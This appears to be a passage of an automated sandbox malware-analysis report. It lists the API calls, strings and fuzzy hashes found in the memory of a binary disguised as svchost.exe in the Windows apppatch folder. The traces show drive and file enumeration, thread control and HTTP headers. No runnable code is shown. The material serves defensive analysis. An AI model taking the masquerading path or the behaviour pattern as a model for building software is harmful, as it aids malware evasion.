                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ParentTextWindowmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4175915554-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020,00000000,-00000010,?,02C9432B,?), ref: 02C9409C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02C9432B,?), ref: 02C940A3
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C940E2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcess_snprintf
                                                                                                                                                                                                              • String ID: %d.%d.%d.%d
                                                                                                                                                                                                              • API String ID: 1060465051-3491811756
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000,00000000,?,?,02CA8BDE,00000000,02CA0BE3,?,?,?,?,?,?), ref: 02CAB8A0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAB740,00000000,00000000,00000000), ref: 02CAB8B5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,02CA0BE3,00000000,?,?,02CA8BDE,00000000), ref: 02CAB8D3
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,02CA8BDE,00000000), ref: 02CAB8E4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1825730051-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000016,75A8EA50,C:\Windows\apppatch\svchost.exe,02CB4A9E), ref: 02CA4181
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA4188
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4198
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • C:\Windows\apppatch\svchost.exe, xrefs: 02CA4176
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcessmemset
                                                                                                                                                                                                              • String ID: C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              • API String ID: 2903515874-1712757466
                                                                                                                                                                                                              • Opcode ID: 31314d10895ead05336e49d125fa37ec33b896f9ce4c4acce5116760a3fb9998
                                                                                                                                                                                                              • Instruction ID: 82046bcf3e23e1ab19f8c046a5839454a425e377f06cc583af198189fec95711
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31314d10895ead05336e49d125fa37ec33b896f9ce4c4acce5116760a3fb9998
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DE0C277B8251266DA251129AC18B9B26199FC5676F250334FB05E2280DB20D90A42B0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: private$public
                                                                                                                                                                                                              • API String ID: 0-4176808989
                                                                                                                                                                                                              • Opcode ID: f99d891fe6c099c107ac18cd8d48603aefdf55e968627f9b066334fde7561c51
                                                                                                                                                                                                              • Instruction ID: cc425a2c4914f69d0cf04fcacd3293f138b94e96c0f83b5b1783a64e3f0f3fc8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f99d891fe6c099c107ac18cd8d48603aefdf55e968627f9b066334fde7561c51
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C4147326042074BCB348A7C85753BA7366FFC631CB68469DD88ACBA64F7739A45C780
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick_snprintf
                                                                                                                                                                                                              • String ID: %dd %dh %dm
                                                                                                                                                                                                              • API String ID: 3495410349-3074259717
                                                                                                                                                                                                              • Opcode ID: 962a6d5f4594c64200323ecb6bd0a01ea290a612fecc3106f9a5bb56825ddafc
                                                                                                                                                                                                              • Instruction ID: 8070302137d3b5f62fc66c869502f6af3e678508e7eb9fd1efc6823baa2f4fe9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 962a6d5f4594c64200323ecb6bd0a01ea290a612fecc3106f9a5bb56825ddafc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77F0EC72B8211517A31CA81DAC0AABA8A9F87C83213CCC63CFD0BCF3D8DCA49C1142C0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CAE6B0: memset.MSVCRT ref: 02CAE6CF
                                                                                                                                                                                                                • Part of subcall function 02CAE6B0: memset.MSVCRT ref: 02CAE6F1
                                                                                                                                                                                                                • Part of subcall function 02CAE6B0: GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02CAE706
                                                                                                                                                                                                                • Part of subcall function 02CAE6B0: SetErrorMode.KERNEL32(00000001), ref: 02CAE71F
                                                                                                                                                                                                                • Part of subcall function 02CAE6B0: GetDriveTypeA.KERNEL32(?), ref: 02CAE768
                                                                                                                                                                                                                • Part of subcall function 02CAE6B0: SetCurrentDirectoryA.KERNEL32(?), ref: 02CAE77B
                                                                                                                                                                                                                • Part of subcall function 02CAE6B0: FindFirstFileA.KERNEL32(?,?), ref: 02CAE7DD
                                                                                                                                                                                                                • Part of subcall function 02CAE6B0: SetErrorMode.KERNEL32(?), ref: 02CAEAF3
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4149), ref: 02CAEB0B
                                                                                                                                                                                                                • Part of subcall function 02CA39D0: EnterCriticalSection.KERNEL32(02CDFB68,74DF0F00,00000000,74DF2F00), ref: 02CA39E9
                                                                                                                                                                                                                • Part of subcall function 02CA39D0: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 02CA39FB
                                                                                                                                                                                                                • Part of subcall function 02CA39D0: _snprintf.MSVCRT ref: 02CA3A1B
                                                                                                                                                                                                                • Part of subcall function 02CA39D0: SetCurrentDirectoryA.KERNEL32(?), ref: 02CA3A2B
                                                                                                                                                                                                                • Part of subcall function 02CA39D0: PathAddBackslashA.SHLWAPI(?), ref: 02CA3B00
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentDirectory$BackslashDriveErrorModePathmemset$CriticalEnterFileFindFirstLogicalSectionStringsType_snprintf
                                                                                                                                                                                                              • String ID: A23C4149$COLV
                                                                                                                                                                                                              • API String ID: 2461973751-242836146
                                                                                                                                                                                                              • Opcode ID: cb58072748d613a2147debdbb3ab1aea78d18740b01a21836909f713bed33687
                                                                                                                                                                                                              • Instruction ID: 01eb2ffc196b64a79ac3e4fac4f8ac9bd1f39019c6fb5874e4ee03f1da3be29a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb58072748d613a2147debdbb3ab1aea78d18740b01a21836909f713bed33687
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44B09261AC1302627A0437B92C26A296B692C88E57320096A7507508858DA14190EABA
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT ref: 02CBB0AE
                                                                                                                                                                                                              • malloc.MSVCRT ref: 02CBB0C3
                                                                                                                                                                                                              • malloc.MSVCRT ref: 02CBB0E9
                                                                                                                                                                                                              • malloc.MSVCRT ref: 02CBB104
                                                                                                                                                                                                                • Part of subcall function 02CBA9D0: free.MSVCRT(?,?,?,75977310,?,02CBCEC2,?,?,?,02CBA2D8), ref: 02CBA9FF
                                                                                                                                                                                                                • Part of subcall function 02CBA9D0: free.MSVCRT(02CBCEC2,?,?,75977310,?,02CBCEC2,?,?,?,02CBA2D8), ref: 02CBAA0F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1480856625-0
                                                                                                                                                                                                              • Opcode ID: bb9695770ccdbf418e985ad6d44b813fa89c2a8fac48adc31f180958340809d6
                                                                                                                                                                                                              • Instruction ID: fe911e7c458a4376e3c7c1efbf53b5eca006740fa337db47f6d7dd9be79a8972
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb9695770ccdbf418e985ad6d44b813fa89c2a8fac48adc31f180958340809d6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4921AFB1A013059FD710CF1AD984A46FBE8FF99310F15C5AAE5888B362D7B1E910CFA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000014,00000000,?,?,?,02C9EF5B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer), ref: 02C9EB1F
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02C9EF5B,00000000,?,?,00000000,Content-Type,?,?,00000000,Referer,?), ref: 02C9EB26
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C9EB36
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02C9EB41
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 471586229-0
                                                                                                                                                                                                              • Opcode ID: bef12609be7df40c1dfde8b3a2b3ccf79178a119fd0674827aad5532f3321eaf
                                                                                                                                                                                                              • Instruction ID: d7a5589c7ce00ff534e3d427de34f32df7f81e1bfd25d9faea614d1b8b7f6ad4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bef12609be7df40c1dfde8b3a2b3ccf79178a119fd0674827aad5532f3321eaf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E4012B33601215ABDB20DA699C88F97B7DCAF95761B544702FE05CB184E720EA04C3E4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,02C9FA2B,?,?,?), ref: 02C9F388
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02C9FA2B,?,?,?), ref: 02C9F38F
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C9F39F
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02C9F3AA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 471586229-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CD4145
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CD4148
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CD4155
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CD4158
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,02CA3D17,02C978C7), ref: 02CA41BE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA41C1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA41CE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA41D1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0